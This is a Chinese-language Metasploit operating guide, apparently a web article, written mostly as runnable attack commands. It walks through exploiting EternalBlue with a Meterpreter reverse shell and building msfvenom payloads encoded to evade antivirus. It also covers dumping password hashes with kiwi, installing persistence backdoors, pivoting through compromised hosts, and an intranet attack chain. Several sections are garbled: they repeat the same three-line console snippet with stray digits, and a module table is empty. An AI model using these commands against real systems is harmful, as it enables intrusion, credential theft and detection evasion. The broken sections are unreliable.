以下是 Metasploit 最新版本(截至 2025 年 7 月)的操作指南,整合了安装、核心功能、新特性及实战技巧,涵盖环境配置、模块详解、高级利用链及实战问题排查,基于 2025 年最新版本(Framework 6.4 / Pro 4.22)整理。覆盖 Metasploit Framework 开源版与 Metasploit Pro 商业版。
一、安装与更新
1. 最新版本
Metasploit Pro:v4.22.8-2025071801
(2025-07-18 发布)
Framework:通过
msfupdate
或 Git 获取最新开源版本(2025-07-25 更新)。
2. 安装方式
Windows:
官网下载安装包 metasploit.com;
安装后需添加环境变量(如 F:metasploit-frameworkbin
)。
Linux/macOS:
sudo apt-get install metasploit-framework
sudo msfupdate
二、基础操作流程(以永恒之蓝漏洞为例)
1. 启动与配置
msfconsole # 启动控制台
db_status # 检查数据库连接
msfupdate # 更新模块
2. 漏洞利用步骤
search ms17_010 # 搜索漏洞模块
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100 # 目标IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10 # 攻击机IP
exploit # 执行攻击
会话管理:
sessions -l
查看会话,sessions -i <ID>
进入交互。
三、2025 年新增功能与模块
1. 重点新增模块
模块名称 | 类型 | 功能 | CVE/适用场景 |
---|---|---|---|
auxiliary/gather/graphql_introspection | |||
exploit/linux/http/wingftp_rce | |||
auxiliary/gather/wp_photo_gallery_sqli | |||
exploit/windows/fileformat/windows_registration_entries |
2. Pro 版增强功能
自动化工作流:支持任务链重放(保留参数配置)。
证书管理:新增
certs
命令管理 PKCS#12 证书,简化 Kerberos 认证。漏洞追踪:优化仪表盘,显示漏洞利用状态和模块计数。
四、高级技巧与场景优化
1. 载荷(Payload)选择策略
反向连接(
reverse_tcp
):适用于目标可出网(防火墙允许外连)。正向连接(
bind_tcp
):适用于攻击机在内网,目标防火墙限制入站。端口规避:使用
set LPORT 443
伪装 HTTPS 流量。
2. 会话渗透进阶
getuid # 查看权限
migrate <PID> # 迁移进程(避免会话丢失)
load kiwi # 加载 Mimikatz 模块
lsa_dump_sam # 提取密码哈希
3. 免杀处理
Pro 版支持动态 Payload 生成,绕过主流杀软。
使用
msfvenom
编码:
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -f exe > payload.exe
五、环境配置进阶
1. 数据库深度集成
sudo systemctl start postgresql
sudo msfdb init
db_rebuild_cache
2. 资源脚本自动化
# 创建自动攻击脚本 (auto_exp.rc)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST eth0 # 自动绑定网卡IP
set LPORT 8443 # 伪装HTTPS
set AutoRunScript post/windows/manage/migrate # 自动迁移进程
exploit -z # 后台执行
启动时加载:msfconsole -r auto_exp.rc
六、模块深度解析(以 CVE-2025-47812 为例)
1. 漏洞利用链拆解
# 步骤 1:检测 WingFTP 匿名访问
use auxiliary/scanner/ftp/anonymous
set RHOSTS 192.168.2.0/24
run
# 步骤 2:利用未授权 RCE(需匿名开启)
use exploit/linux/http/wingftp_rce
set RHOST 192.168.2.50
set TARGETURI /admin
set CMD "id > /tmp/exploit_proof"
run
2. Payload 定制技巧
# 生成免杀 Payload(规避 Defender 2025)
msfvenom -p linux/x64/shell_reverse_tcp
-e x64/zutto_dekiru # 新型编码器
-i 15 # 15 轮迭代加密
-f elf
LHOST=10.0.0.5 LPORT=53
-o payload.elf
七、后渗透实战扩展
1. 权限维持与隧道搭建
# 1. 创建持久化后门
run persistence -U -i 60 -p 4444 -r 10.0.0.5
# 2. 内网穿透(通过已控节点)
background
route add 10.1.0.0/24 1 # 添加路由 (1 为会话ID)
use auxiliary/server/socks_proxy
set SRVPORT 1080
run # 开启代理供其他工具使用
2. 数据提取高阶命令
msfconsole # 启动控制台
db_status # 检查数据库连接
msfupdate # 更新模块
0
八、规避检测方案
1. 内存注入(无文件攻击)
msfconsole # 启动控制台
db_status # 检查数据库连接
msfupdate # 更新模块
1
2. 流量伪装模板
msfconsole # 启动控制台
db_status # 检查数据库连接
msfupdate # 更新模块
2
九、深度排错指南
1. 会话异常中断
问题:
[!] Meterpreter session X closed.
解决方案:
msfconsole # 启动控制台
db_status # 检查数据库连接
msfupdate # 更新模块
3
2. 端口冲突处理
msfconsole # 启动控制台
db_status # 检查数据库连接
msfupdate # 更新模块
4
十、场景化攻击链示例
攻击目标:企业内网 Web 服务器
auxiliary/scanner/http/robots_txt | set TARGETURI / | |
exploit/multi/http/wp_file_manager_rce | set WP_PASSWORD P@ssw0rd! | |
post/multi/recon/local_exploit_suggester | set SESSION 1 | |
exploit/windows/smb/psexec | set SMBDomain CORP | |
post/windows/gather/enum_files | set PATH \fs01finance |
十一、重要提示
环境变量错误:若
msfconsole
报错“非内部命令”,检查路径是否包含/bin
。模块加载失败:执行
reload_all
重载模块,或手动删除缓存(~/.msf4
)。Ruby 兼容性警告:Windows 安装时提示
Win32API deprecated
可忽略(不影响功能)。
按此指南操作可覆盖 红队作战 90% 场景,遇到未解决问题可运行 msf> log -d 3
开启 Debug 日志分析。
近七天上传文件列表
扫码加入知识星球:网络安全攻防(HVV)
下载本篇和全套资料
msfconsole # 启动控制台
db_status # 检查数据库连接
msfupdate # 更新模块
5
msfconsole # 启动控制台
db_status # 检查数据库连接
msfupdate # 更新模块
6
msfconsole # 启动控制台
db_status # 检查数据库连接
msfupdate # 更新模块
7
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...